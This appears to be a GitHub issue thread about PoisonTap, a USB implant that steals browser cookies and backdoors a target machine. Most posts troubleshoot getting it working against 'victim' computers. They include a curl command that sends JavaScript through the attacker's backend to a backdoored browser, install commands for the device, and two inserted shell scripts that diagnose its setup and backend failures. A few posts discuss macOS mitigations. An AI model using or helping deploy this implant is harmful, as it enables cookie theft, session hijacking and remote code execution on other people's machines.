Is the backdoor required to get the cookies list? I don't like the backdoor because I think it is easily traceable. I tried it too on Windows 10 but I didn't see the new wired connection, so I don't know what happens there, but I read about a lot of people with problems with Windows 10. The JS is being executed because for each try there is a new "==== (Date) [1480720557967] ==== PoisonTap is listening".

Any idea? I don't know anything about Pi Zero, but I think this isn't the problem.

Thank you and goodbye.

Clean Target

hi,

is there any way to clean the target and kill the backdoor?

DHCP configuration

Hello,

Thanks for sharing this !
I've a question, what is your dhcp configuration please ? (dhcpd.conf content)

Thanks !

Hey, I have some questions about PoisonTap. Please help me, very very thanks...

@samyk @jreziga
I'm on a Raspberry Pi 3B, connected to a PC (Win 10), and I use a USB cable to connect to the PC. Is that right?
Q1:
I'm looking at this guide, part 2.
And I tried to run pi_startup.sh; launching throws this error:
root@raspberrypi:/home/pi/poisontap# chmod +x pi_
pi_poisontap.js pi_startup.sh
root@raspberrypi:/home/pi/poisontap# chmod +x pi_startup.sh
root@raspberrypi:/home/pi/poisontap# ./pi_startup.sh
./pi_startup.sh: 8: cd: can't cd to /sys/kernel/config/usb_gadget/
ln: failed to create symbolic link ‘configs/c.1/acm.usb0’: File exists
ln: failed to create symbolic link ‘configs/c.1/ecm.usb0’: File exists
ls: cannot access /sys/class/udc: No such file or directory
Cannot find device "usb0"
Failed to bring up usb0.
usb0: ERROR while getting interface flags: No such device
SIOCADDRT: No such device
[....] Starting isc-dhcp-server (via systemctl): isc-dhcp-server.serviceJob for isc-dhcp-server.service failed. See 'systemctl status isc-dhcp-server.service' and 'journalctl -xn' for details.
failed!

Q2:
root@raspberrypi:/home/pi/poisontap# nodejs backend_server.js

/home/pi/poisontap/backend_server.js:9
var server = http.createServer((request, response) => {
^
SyntaxError: Unexpected token >
at Module._compile (module.js:439:25)
at Object.Module._extensions..js (module.js:474:10)
at Module.load (module.js:356:32)
at Function.Module._load (module.js:312:12)
at Function.Module.runMain (module.js:497:10)
at startup (node.js:119:16)
at node.js:906:3

root@raspberrypi:/home/pi/poisontap# node backend_server.js
events.js:160
throw er; // Unhandled 'error' event
^

Error: listen EADDRINUSE :::1337
at Object.exports._errnoException (util.js:1026:11)
at exports._exceptionWithHostPort (util.js:1049:20)
at Server._listen2 (net.js:1257:14)
at listen (net.js:1293:10)
at Server.listen (net.js:1389:5)
at Object.<anonymous> (/home/pi/poisontap/backend_server.js:50:8)
at Module._compile (module.js:570:32)
at Object.Module._extensions..js (module.js:579:10)
at Module.load (module.js:487:32)
at tryModuleLoad (module.js:446:12)
root@raspberrypi:/home/pi/poisontap# nodejs backend_server.js

What should I do???

Windows support

Does PoisonTap really work with Windows 7 or 10?
AFAIK, CDC ECM is not supported so Windows should never see the device as an ethernet device.

Installation - problems to get started

Hi, I installed everything so far and getting the following errors:

/home/pi/poisontap/pi_startup.sh: 8: cd: can't cd to /sys/kernel/config/usb_gadget/
ln: failed to create symbolic link ‘configs/c.1/acm.usb0’: File exists
ln: failed to create symbolic link ‘configs/c.1/ecm.usb0’: File exists
ls: cannot access /sys/class/udc: No such file or directory
Ignoring unknown interface usb0=usb0.
usb0: ERROR while getting interface flags: No such device
SIOCADDRT: No such device
[....] Starting isc-dhcp-server (via systemctl): isc-dhcp-server.serviceJob for isc-dhcp-server.service failed. See 'systemctl status isc-dhcp-server.service' and 'journalctl -xn' for details.
failed!
net.ipv4.ip_forward = 1

systemctl status isc-dhcp-server.service:

isc-dhcp-server.service - LSB: DHCP server
Loaded: loaded (/etc/init.d/isc-dhcp-server)
Active: failed (Result: exit-code) since Fri 2016-11-18 16:21:50 UTC; 22s ago
Process: 3556 ExecStart=/etc/init.d/isc-dhcp-server start (code=exited, status=1/FAILURE)

Any idea what could be wrong?

Backend Server not pushing commands to victim?

So everything is working on the pi zero (I think, I get the same stuff in the network as Samy does). But the problem comes to the server.

First I want to ask: when the pi makes the outbound connection to the server, should the server say anything? All I see is the "listening on port 1337" but nothing when the pi is plugged in.

I am running the backend_server.js in a screen (am I supposed to run it in screen? Or should I just run it in the normal shell?), and I can send commands like the curl 'http://domain.com/1337/exec?alert("message")'. It says sent in the shell, then when I go to the screen it says request received. But there is no evidence of anything being sent to the victim machine. Nothing on console, network, logs, anything. Is there something wrong with my server? (I am using AWS ubuntu server and have 1337 port forwarded).

Information that might be useful to help me:
When looking at the console, all of the links that are domain.com/Poisontap get error 404, but I assume this is fine because that page doesn't actually exist. The network is fine, with a 404 here and there. My network graph is similar to the one Samy shows in his video, but I have a lot more gray area.

Any help would be super appreciated, Thanks!!!

Can't get started

Hi. I try to run PoisonTap on my RPi Zero, but I still have the same problem.

Any solution?
When I use sudo ./pi_startup.sh I get this error:

ls: write error: Device or resource busy
Ignoring unknown interface usb0=usb0.
./pi_startup.sh: 42: ./pi_startup.sh: /etc/init.d/isc-dhcp-server: not found
net.ipv4.ip_forward = 1

But if I use ./pi_startup.sh

./pi_startup.sh: 11: ./pi_startup.sh: cannot create idVendor: Permission denied
./pi_startup.sh: 12: ./pi_startup.sh: cannot create idProduct: Permission denied
./pi_startup.sh: 13: ./pi_startup.sh: cannot create bcdDevice: Permission denied
./pi_startup.sh: 14: ./pi_startup.sh: cannot create bcdUSB: Permission denied
./pi_startup.sh: 16: ./pi_startup.sh: cannot create strings/0x409/serialnumber: Permission denied
./pi_startup.sh: 17: ./pi_startup.sh: cannot create strings/0x409/manufacturer: Permission denied
./pi_startup.sh: 18: ./pi_startup.sh: cannot create strings/0x409/product: Permission denied
./pi_startup.sh: 20: ./pi_startup.sh: cannot create configs/c.1/strings/0x409/configuration: Permission denied
./pi_startup.sh: 21: ./pi_startup.sh: cannot create configs/c.1/MaxPower: Permission denied
ln: failed to create symbolic link ‘configs/c.1/acm.usb0’: File exists
./pi_startup.sh: 33: ./pi_startup.sh: cannot create functions/ecm.usb0/host_addr: Permission denied
./pi_startup.sh: 34: ./pi_startup.sh: cannot create functions/ecm.usb0/dev_addr: Permission denied
ln: failed to create symbolic link ‘configs/c.1/ecm.usb0’: File exists
./pi_startup.sh: 36: ./pi_startup.sh: cannot create UDC: Permission denied
ifup: failed to open lockfile /run/network/.ifstate.lock: Permission denied
SIOCSIFFLAGS: Operation not permitted
SIOCADDRT: Operation not permitted
./pi_startup.sh: 42: ./pi_startup.sh: /etc/init.d/isc-dhcp-server: not found
sysctl: permission denied on key 'net.ipv4.ip_forward'
iptables v1.4.21: can't initialize iptables table `nat': Permission denied (you must be root)
Perhaps iptables or your kernel needs to be upgraded.

Having trouble getting things working on USB Armory

So first up, I did host the backend on Heroku, so that might be part of the issue, but I'm reasonably confident I set up all the references to the backend correctly and the backend at least does appear to receive the request (though it hangs indefinitely).

As for the Armory, when I plug it in (this is all macOS Sierra), takes about 5-10 seconds and then it shows up in the network devices list on top. "Configure IPv4: DHCP", apparently gets an IP in the link local range (169.254.70.148 in my case). Does not respond to 1.0.0.1. Also can't SSH into the Armory anymore. Machine can still talk to the outside internet without issue.

I did all the setup on this machine, but before plugging it in, I removed it from the devices list and turned off connection sharing to the device so that it'd be starting from a blank slate without any of the setup steps I took to get things configured still in place.

/cc @abarisani in case you're interested.

License

Hello. I'd like to package this tool for ArchStrike but I couldn't find any license file. Can you add one?

Password asked to access the network ?

Hi, after doing this to ssh into my RPi, I followed everything in the README and then rebooted my Pi.

Now when I plugin my Pi into my computer (Debian 8 Jessie), Gnome asks me for a password for some reason and the connection cannot be made. I also had a different network profile (as described here) to give my Pi internet access but I deleted it as everything should now be working.

Thanks

Mac OS X mitigation

On my macOS Sierra the automatic network configuration only works when running as a "administrator" user. When running as a "standard" user a pop-up requests manual network configuration. This seems like an effective mitigation for the small additional effort to run as "standard".

Having trouble with the backdoor

When the Pi is plugged in, PoisonTap kicks off just fine. The only problem I have is that the backdoor is not connecting. It may just be user error but I can't figure it out. Also there is a target_backdoor.js that has a link to a log.php. I didn't see a log.php in the repo or a connection like it in backend_server.js.
Thanks for any help.

osx mitigations?

Does anyone have any mitigations to prevent usb-ethernet adapters from being automatically connected to?

I've noticed the following behavior:
-If I create a new Network Location in the "Network" section of MacOS's System Preferences and the usb-ethernet adapter is plugged in, the new Location will automatically add the device to the list of adapters and connect to it.
-If I create a new Location without the device plugged in, activate that location, and then plug in the device, it will not be automatically added to the list of devices, nor automatically connected to.

mkdir not permitted on /sys/kernel/config

Hello ! Thanks for your work it looks very nice.

I have an issue on "pi_startup.sh"

I added /etc/init.d/pi_startup.sh in "/etc/rc.local" to start the script at boot but I got stuck on the first line: I can't mkdir on /sys/kernel/config. I checked that it is mounted, but even as root I can't create any directory.

Any idea please?
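Several posts in this thread (the Pi 3B questions, "Installation - problems to get started", "Can't get started" and this mkdir issue) show the same family of pi_startup.sh failures: "can't cd to /sys/kernel/config/usb_gadget/", "cannot access /sys/class/udc", "Permission denied", "File exists" on the config symlinks, and "/etc/init.d/isc-dhcp-server: not found". The script below is an added example, not part of PoisonTap: it checks the condition behind each of those errors before anything is written to sysfs. The ROOT and EUID parameters are assumptions added so it can be exercised against a constructed directory tree; the module and overlay names (libcomposite, dwc2) and the UDC name 20980000.usb are the ones Raspbian uses on a Pi Zero. Note that the UDC check is the one a Pi 3B fails: its USB ports sit behind the onboard hub chip and only work as a host.

```shell
#!/bin/sh
# Added example (not PoisonTap's own code): preflight for a configfs USB-gadget
# setup such as pi_startup.sh.
#
# Usage: gadget_preflight [ROOT] [EUID]
#   ROOT  prefix prepended to /sys, /proc and /etc; empty for the live system,
#         a constructed tree in tests (assumption added for offline testing)
#   EUID  effective uid to check; defaults to id -u
# Prints one "ok:", "WARN:" or "FAIL:" line per check; returns the number of failures.
gadget_preflight() {
  root="${1:-}"
  euid="${2:-$(id -u)}"
  fails=0

  # 1. Root: every later write to configfs, plus ifup, sysctl and iptables, needs it.
  if [ "$euid" -eq 0 ]; then
    echo "ok: running as root"
  else
    echo "FAIL: running as uid $euid, sysfs writes will give 'Permission denied' (use sudo)"
    fails=$((fails + 1))
  fi

  # 2. configfs mounted: without it /sys/kernel/config is just an empty directory.
  if grep -qs ' configfs ' "$root/proc/mounts"; then
    echo "ok: configfs is mounted"
  else
    echo "FAIL: configfs not mounted (mount -t configfs none /sys/kernel/config)"
    fails=$((fails + 1))
  fi

  # 3. usb_gadget directory: created by the libcomposite module, never by mkdir.
  if [ -d "$root/sys/kernel/config/usb_gadget" ]; then
    echo "ok: /sys/kernel/config/usb_gadget present (libcomposite loaded)"
  else
    echo "FAIL: /sys/kernel/config/usb_gadget missing, run 'modprobe libcomposite' first"
    fails=$((fails + 1))
  fi

  # 4. A USB device controller: a gadget binds to one; with none, usb0 never appears.
  #    A Pi Zero needs the dwc2 overlay and module; boards whose USB ports sit behind
  #    a hub chip (Pi 3B) only act as a USB host.
  udc="$(ls "$root/sys/class/udc" 2>/dev/null | head -n 1)"
  if [ -n "$udc" ]; then
    echo "ok: UDC available: $udc"
  else
    echo "FAIL: no UDC in /sys/class/udc (dtoverlay=dwc2 and modprobe dwc2 on a Pi Zero)"
    fails=$((fails + 1))
  fi

  # 5. Leftover gadget from a previous run: re-creating the config symlinks then fails
  #    with 'File exists'. Unbind it (echo '' > UDC) and remove it before re-running.
  for g in "$root"/sys/kernel/config/usb_gadget/*/; do
    [ -d "$g" ] && echo "WARN: gadget already configured in $g, expect 'File exists' on re-run"
  done

  # 6. DHCP server installed: the setup script starts isc-dhcp-server via its init script.
  if [ -x "$root/etc/init.d/isc-dhcp-server" ]; then
    echo "ok: isc-dhcp-server init script present"
  else
    echo "FAIL: /etc/init.d/isc-dhcp-server not found (apt-get install isc-dhcp-server)"
    fails=$((fails + 1))
  fi

  return "$fails"
}

# Run against the live system with: sudo sh gadget_preflight.sh --run
case "${1:-}" in --run) gadget_preflight ;; esac
```

Run it as root before pi_startup.sh and fix every FAIL line in order; the checks are ordered the way the errors cascade, so a missing libcomposite explains both the cd failure and the later "File exists" and "usb0" errors.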

Donation address?

@samyk et al, well done! Is there a donation address to support your research? Super important in upgrading worldwide security. particularly distributing the code. Making it a very real threat is what will get these things fixed fast.
WebSocket code doesn't load/All backdoored sites return 404

I looked at #29 and am having a similar issue but their solutions are not working. The browsers (tested Safari and Chrome on Win10 and OS X) do not load the WebSocket backdoor. They all return 404 on all of the URLs I have tested like:
http://nfl.com/PoisonTap
http://weibo.com/PoisonTap
etc...

Normally I use an internal DNS server and figured this was the issue by looking at #55 but I have tested while using Google DNS and the issue still arises. Any ideas?

Running on RPi 2 without Ethernet to USB

I'm using a Raspberry Pi 2 powered by the power socket and connected to the victim (Windows 10 Laptop) with an Ethernet cable. I can successfully run ./pi_startup.sh with no errors after doing the following steps:

  • Installation instructions from README without the USB stuff and replaced all instances of usb0 with eth0 in /etc/network/interfaces:
echo -e "\nauto eth0\nallow-hotplug eth0\niface eth0 inet static\n\taddress 1.0.0.1\n\tnetmask 0.0.0.0" >> /etc/network/interfaces
echo "/bin/sh /home/pi/poisontap/pi_startup.sh" >> /etc/rc.local
mkdir /home/pi/poisontap
chown -R pi /home/pi/poisontap
apt-get update && apt-get upgrade
apt-get -y install isc-dhcp-server dsniff screen nodejs
cp /home/pi/poisontap/dhcpd.conf /etc/dhcp/dhcpd.conf
  • Replaced pi_startup.sh from @Z3r0byte https://github.com/Z3r0byte/poisontap/blob/master/pi_startup.sh

  • Rebooted the RPi, ran sudo ./poisontap/pi_startup.sh and it runs successfully without errors.

  • Connected to the victim PC (which has Chrome open) with an Ethernet cable from the RPi Ethernet port to the victim's Ethernet port and rebooted the RPi. The victim PC successfully gets the IP 1.0.0.10. Browsing is slower and spotty but apart from that nothing shows that PoisonTap is working. No cookies or such appear in /home/pi/poisontap/. Am I supposed to run anything else on the RPi?

When attempting to run nodejs backend_server.js I get the same error as #24

/home/pi/poisontap/backend_server.js:9
var server = http.createServer((request, response) => {
SyntaxError: Unexpected token >
at Module._compile (module.js:439:25)
at Object.Module._extensions..js (module.js:474:10)
at Module.load (module.js:356:32)
at Function.Module._load (module.js:312:12)
at Function.Module.runMain (module.js:497:10)
at startup (node.js:119:16)
at node.js:902:3
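The two backend_server.js errors quoted in this post and in the earlier Pi 3B post have mechanical causes: "SyntaxError: Unexpected token >" at the arrow function means the interpreter is too old (the Raspbian Jessie nodejs package is 0.10.x, and arrow functions need Node 4 or newer), and "listen EADDRINUSE :::1337" means a copy of the server is already bound to the port, typically in a screen session that was never stopped. The following added example, not PoisonTap's own code, checks both before starting the backend. The port-parsing function takes the ss output as a parameter so it can be tested on a constructed sample; the version threshold of 4 is the assumption it encodes.

```shell
#!/bin/sh
# Added example (not PoisonTap's own code): preflight for backend_server.js.

# node_has_arrow_functions VERSION -> 0 when VERSION (as printed by node --version)
# has major >= 4, i.e. parses ES2015 arrow functions without flags.
node_has_arrow_functions() {
  ver="${1#v}"
  major="${ver%%.*}"
  case "$major" in
    ''|*[!0-9]*) return 1 ;;   # not a version string, e.g. node not installed
  esac
  [ "$major" -ge 4 ]
}

# port_in_use PORT SS_OUTPUT -> 0 when a LISTEN socket on PORT appears in `ss -ltn`
# output. Compares the last ':'-separated field of the local address, so *:1337,
# :::1337, 0.0.0.0:1337 and [::]:1337 are all recognised.
port_in_use() {
  printf '%s\n' "$2" | awk -v port="$1" '
    $1 == "LISTEN" { n = split($4, a, ":"); if (a[n] == port) found = 1 }
    END { exit found ? 0 : 1 }'
}

# backend_preflight [PORT] -> runs both checks against the live system,
# returns the number of failures.
backend_preflight() {
  port="${1:-1337}"
  fails=0
  ver="$(node --version 2>/dev/null || nodejs --version 2>/dev/null || echo none)"
  if node_has_arrow_functions "$ver"; then
    echo "ok: node $ver supports arrow functions"
  else
    echo "FAIL: node is '$ver'; backend_server.js uses => and needs Node 4 or newer"
    fails=$((fails + 1))
  fi
  if port_in_use "$port" "$(ss -ltn 2>/dev/null)"; then
    echo "FAIL: something already listens on $port; find it with 'ss -ltnp' (or 'screen -ls' for an old session) and stop it"
    fails=$((fails + 1))
  else
    echo "ok: port $port is free"
  fi
  return "$fails"
}

# Run with: sh backend_preflight.sh --run [PORT]
case "${1:-}" in --run) backend_preflight "${2:-1337}" ;; esac
```

On a Pi this distinguishes the "nodejs" binary from the distro package (0.10.x) from a newer "node" binary installed separately, which is why the same script fails under one name and hits EADDRINUSE under the other in the Pi 3B post: the first start from a screen session is still holding the port.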

log.php not included - by design?

Hi,

I think I know the answer to this.. but the git repo doesn't include log.php. I'm guessing this is because it's a simple script that I should write myself just to log all input from the target_backdoor.js?

Thanks,

Would poisontap still work if Raspberry Pi Zero is turned into a USB-Computer?

Hello!

When I saw PoisonTap I thought that it was a very great idea but hated the way it is meant to be used, with an additional micro-USB cable. Because of that, I looked for something different and found USB Armory, but it is too expensive, so I looked for a way to turn a Raspberry Pi Zero into a USB computer.

I found this post but it modifies the Pi's hardware, so the exploit might not work. Anyone here knows if it would still work correctly?

Thank you.
